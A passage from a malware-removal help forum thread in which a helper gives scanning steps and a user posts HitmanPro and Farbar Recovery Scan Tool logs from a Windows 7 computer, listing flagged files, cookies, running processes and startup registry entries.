  • The program will start to scan the computer. It would only take several minutes.
  • When the scan is done click on Save Log (4) and close HitmanPro! (5)
  • Copy and paste the content of the log file in your next reply.
hitman.gif




Step 2

Start FRST with administator privileges.
  • Press the Scan button.
  • When finished, FRST will produce a log (FRST.txt) in the same directory the tool was run from.
    Please copy and paste this log in your next reply.


#9 LynnBR

LynnBR
  • Topic Starter

  • Members
  • 104 posts
  • OFFLINE
  •  
  • Gender:Female
  • Local time:01:23 AM

Posted 28 August 2014 - 05:23 PM

Running much better, don't have to mess with resetting IE security settings now! No slow downs so far, no dllhost explosion.

 

Hitman log (that got some attention here!)

 

HitmanPro 3.7.9.224
www.hitmanpro.com
   Computer name . . . . : E2013-3
   Windows . . . . . . . : 6.1.1.7601.X64/8
   User name . . . . . . : HACI\mike
   UAC . . . . . . . . . : Disabled
   License . . . . . . . : Free
   Scan date . . . . . . : 2014-08-28 15:12:47
   Scan mode . . . . . . : Normal
   Scan duration . . . . : 4m 51s
   Disk access mode  . . : Direct disk access (SRB)
   Cloud . . . . . . . . : Internet
   Reboot  . . . . . . . : No
   Threats . . . . . . . : 0
   Traces  . . . . . . . : 204
   Objects scanned . . . : 2,284,528
   Files scanned . . . . : 28,941
   Remnants scanned  . . : 1,047,991 files / 1,207,596 keys
Suspicious files ____________________________________________________________
   C:\Users\mike\Desktop\FRST64.exe
      Size . . . . . . . : 2,103,296 bytes
      Age  . . . . . . . : 0.0 days (2014-08-28 14:18:34)
      Entropy  . . . . . : 7.5
      SHA-256  . . . . . : 820D53533899FA1DF19C7776368B3E242A5306E0DDDBC7ACAA58CA873B88AACA
      Needs elevation  . : Yes
      Fuzzy  . . . . . . : 24.0
         Program has no publisher information but prompts the user for permission elevation.
         Entropy (or randomness) indicates the program is encrypted, compressed or obfuscated. This is not typical for most programs.
         Authors name is missing in version info. This is not common to most programs.
         Version control is missing. This file is probably created by an individual. This is not typical for most programs.
         Time indicates that the file appeared recently on this computer.
   C:\Users\mike\Desktop\FSS.exe
      Size . . . . . . . : 415,232 bytes
      Age  . . . . . . . : 0.0 days (2014-08-28 14:16:42)
      Entropy  . . . . . : 7.9
      SHA-256  . . . . . : 149759CADFDF8C19A4104C7DB08BA490D33CFBD29785640385239087B79E1FD2
      Needs elevation  . : Yes
      Fuzzy  . . . . . . : 24.0
         Program has no publisher information but prompts the user for permission elevation.
         Entropy (or randomness) indicates the program is encrypted, compressed or obfuscated. This is not typical for most programs.
         Authors name is missing in version info. This is not common to most programs.
         Version control is missing. This file is probably created by an individual. This is not typical for most programs.
         Time indicates that the file appeared recently on this computer.
      Forensic Cluster
          0.0s C:\Users\mike\Desktop\FSS.exe
          0.0s C:\Users\mike\Desktop\FSS.exe
   C:\Windows\SysWOW64\hslide32.ocx
      Size . . . . . . . : 63,408 bytes
      Age  . . . . . . . : 503.0 days (2013-04-12 16:16:21)
      Entropy  . . . . . : 5.8
      SHA-256  . . . . . : 78196E0A70083136E388672802A9B6B16D43BE9EC59E0A3A9A67F1E8D962C09C
      Product  . . . . . : HSLIDE
      Publisher
      Description  . . . : Mabry HSlide Control
      Version  . . . . . : 1.10.008
      Copyright  . . . . : Copyright © 1994-1998 by Mabry Software, Inc.
      RSA Key Size . . . : 512
      LanguageID . . . . : 1033
      Authenticode . . . : Self-signed
      Fuzzy  . . . . . . : 27.0
         Program is code signed with a weak certificate. This is common to malware.
         Program is code self-signed.
         The file is located in a folder that contains core operating system files from Windows. This is not typical for most programs and is only common to system tools, drivers and hacking utilities.
         Authors name is missing in version info. This is not common to most programs.
   C:\Windows\SysWOW64\vslide32.ocx
      Size . . . . . . . : 62,896 bytes
      Age  . . . . . . . : 503.0 days (2013-04-12 16:16:21)
      Entropy  . . . . . : 5.7
      SHA-256  . . . . . : 3E9FBA353566BDBDD50D63E1614E665D065D4261AD90CA569A6EA3DE2282E501
      Product  . . . . . : VSLIDE
      Publisher
      Description  . . . : Mabry VSlide Control
      Version  . . . . . : 1.10.008
      Copyright  . . . . : Copyright © 1994-1998 by Mabry Software, Inc.
      RSA Key Size . . . : 512
      LanguageID . . . . : 1033
      Authenticode . . . : Self-signed
      Fuzzy  . . . . . . : 27.0
         Program is code signed with a weak certificate. This is common to malware.
         Program is code self-signed.
         The file is located in a folder that contains core operating system files from Windows. This is not typical for most programs and is only common to system tools, drivers and hacking utilities.
         Authors name is missing in version info. This is not common to most programs.

Cookies _____________________________________________________________________
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\07Y963DN.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\0X47FEUC.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\1DE45WF9.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\1F4HN92U.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\1JP13F7V.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\1JQ4DHAH.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\1KQ0G9N4.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\1QVCFGJ8.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\1RCG0I6Y.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\1RHY7PFE.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\1VGJOL6J.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\1Y8575FI.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\2030LIT1.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\24GT313D.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\257HE9P6.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\28TDWLII.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\2F14ZTX0.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\2PFKLEEJ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\2RJTFR16.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\3GHUINB8.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\3HS62TPR.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\3RBV1X3B.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\3RJR3WAS.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\3SEKDGGA.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\3Z8ZLBGW.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\40TKDT4E.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\42K36HKW.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\43ZGJ19B.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\4AVFJS8A.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\4BOKATW8.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\4EIHQYDU.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\4I8FPJGK.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\4M3LRT4O.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\4PRXRZI5.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\4YJKY3BE.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\5IIKP8S7.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\5JCKIY4X.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\5OHQ9XNA.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\5RBH28TO.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\606DQP10.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\6GSOUKZR.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\6PQF2RTS.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\6XQ9GB5G.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\70AMCY9G.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\783R2KE9.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\78Q9GURW.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\78UZ5MT1.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\7C9U08D4.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\7D5LI8G3.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\7I2IXN8J.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\7QC1M5SA.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\7SUBXQ6T.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\81MGGTHO.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\82AU9ODZ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\88MYNEY8.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\88V46ED2.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\8ATP7UC8.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\8ZDM6L5F.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\9AJXTH79.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\9G1D6Q6O.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\9J0WJ6NF.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\9MQI3W65.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\9QBUE855.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\9QSV316X.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\9R7K41WD.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\A1CXTFR9.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\A526QFRM.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\AAJ9GA0D.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\AON1KV5H.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\APSU7Q8C.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\AQJ0E322.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\AUEQ2FWX.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\AVNDX4PS.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\BJPEJCX4.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\BTD11ZPV.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\BXXSCY36.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\C4PRSUCR.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\C7RPE3EQ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\CV328LOW.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\CZPUDKOM.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\D2ASCYMC.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\D5M00QSS.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\D72YROJ8.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\D7SD01HM.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\DBD7JGSS.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\DDP6H6E1.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\DJHPXG40.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\DQW1O8Z0.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\DRE5185X.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\E9H6SHOI.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\EFJZKKBA.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\EJX6S9PC.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\ELGYSVCY.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\EN3511ZI.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\EU3B3658.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\EUGRF7MS.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\F219U8Y2.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\F6VFQOI9.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\FAX3Z7WV.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\FEOJM082.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\FLMPSGAJ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\FOO9RJIM.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\FQXPSDZL.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\FRMWEOJU.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\FWGNUQQ5.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\FX9ZR4NT.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\G2ST3N3P.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\G8M174SG.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\GKJH3LE0.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\GM06FUT4.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\GY8QCXYU.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\H4EO9QMO.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\HOFCGKFL.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\IFF2LMLH.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\ITOF30UD.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\IWLS4LB8.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\IWMCK0LT.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\J4U9BCSV.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\JA0DKY6H.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\JJ8WKF32.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\JQLYDROV.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\JR4F5H1H.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\JSYKZ9UJ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\JY8H48KR.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\K3377WNQ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\K44LVU29.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\KXAPDO30.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\LDYCRJ63.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\LTIM8JO2.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\M6CKM6S3.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\M6DSYPGS.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\M6I5QWF3.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\M9YQABH1.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\MG3O2S1V.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\MI04HOSN.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\MPC5LQAN.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\MZIR8EH5.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\N2EMVL30.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\N5Z6Z7XS.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\NATC0BVM.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\NDDS29PC.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\NTGWQN8P.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\NV7WPLHF.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\OJ7FGABI.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\OS74BHYB.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\P4XU1DTF.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\P686WL7Y.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\P8TA4E72.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\P9FXJ1A6.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\PBRQEXCT.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\PIKT1MUZ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\PRATSX95.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\PW3E47GD.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\PZ22CWGN.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\Q8I88SVW.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\QAJMKTHT.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\QC1JXDMZ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\QI8OHXTY.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\QVLSRAQG.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\R3GCXQ7L.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\RCYRTWE5.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\RJBM0HQQ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\RNKG7LUE.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\RWGMIX69.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\SJIS8VNH.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\ST1HPQIQ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\T0M77QQI.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\T1RCQ1SP.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\TTB26LHQ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\TVBJSI25.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\TWG0NYEQ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\U2MTPEY5.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\UB7SS1Q1.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\UJEI4MVW.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\UWQX407E.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\V39DLSZG.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\VLGFQWYK.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\W0F7YHT8.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\W22B5Q3H.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\W2E00QY4.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\W6NCUHZG.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\WCHSGSF5.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\WFKOMFTY.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\WFY0DDHR.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\X1CBVMYP.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\X77UQM9W.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\XEGIHKYJ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\XJOWS15X.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\XNVSI9SL.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\XRYWQNDX.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\Y5D1BQ94.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\YACK9GT2.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\YCTVD0QY.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\YL58FUSQ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\YWK768WC.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\YX3RMCZS.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\Z1N87RWM.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\ZFRBCWVL.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\ZKAZ323T.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\ZP4BZ3JL.txt

 

And FRST:

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 25-08-2014
Ran by mike (administrator) on E2013-3 on 28-08-2014 15:20:15
Running from C:\Users\mike\Desktop
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmService.exe
(Cisco WebEx LLC) C:\Windows\SysWOW64\atashost.exe
(Toshiba America Information Systems, Inc.) C:\Program Files (x86)\Toshiba\CallManager\CmRegService.exe
(UPEK Inc.) C:\Program Files\Common Files\SPBA\upeksvr.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
() C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(SafeNet, Inc) C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe
(Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Authentication Manager\WaveAMService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\Audio\HDA\RtDCpl64.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
(Spotify Ltd) C:\Users\mike\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
(Toshiba America Information Systems, Inc.) C:\Program Files (x86)\Toshiba\CallManager\CallManager.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtDCpl64.exe [2907240 2011-07-20] (Realtek Semiconductor Corp.)
HKLM\...\Run: [TdmNotify] => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmNotify.exe [381296 2011-12-08] (Wave Systems Corp.)
HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe [4144944 2013-02-14] (ESET)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284480 2012-05-30] (Intel Corporation)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291648 2012-10-16] (Intel Corporation)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [41336 2014-05-08] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [840568 2014-05-08] (Adobe Systems Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767200 2014-04-17] (Advanced Micro Devices, Inc.)
Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist Corporate\1055\G2AWinLogon_x64.dll (Citrix Online, a division of Citrix Systems, Inc.)
Winlogon\Notify\spba: C:\Program Files\Common Files\SPBA\homefus2.dll (UPEK Inc.)
HKU\S-1-5-21-462157724-132793273-1689201830-1142\...\Run: [Raptr] => C:\Program Files (x86)\Raptr\raptrstub.exe [55568 2014-08-19] (Raptr, Inc)
HKU\S-1-5-21-462157724-132793273-1689201830-1142\...\Run: [DellSystemDetect] => C:\Users\networkadmin\AppData\Local\Apps\2.0\DOV7KP1X.3TQ\BW5O2AO8.P1P\dell..tion_0f612f649c4a10af_0005.000a_17ece8424e43daec\DellSystemDetect.exe [265280 2014-08-27] (Dell)
HKU\S-1-5-21-462157724-132793273-1689201830-1165\...\Run: [Spotify] => C:\Users\mike\AppData\Roaming\Spotify\Spotify.exe [6621752 2014-08-27] (Spotify Ltd)
HKU\S-1-5-21-462157724-132793273-1689201830-1165\...\Run: [Spotify Web Helper] => C:\Users\mike\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1245752 2014-08-27] (Spotify Ltd)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Call Manager.lnk
ShortcutTarget: Call Manager.lnk -> C:\Program Files (x86)\Toshiba\CallManager\CallManager.exe (Toshiba America Information Systems, Inc.)
Startup: C:\Users\mike\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Reminder.lnk
ShortcutTarget: Reminder.lnk -> G:\CheckIn\Chklogin.exe ()
ShellIconOverlayIdentifiers: EnabledUnlockedFDEIconOverlay -> {30D3C2AF-9709-4D05-9CF4-13335F3C1E4A} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)
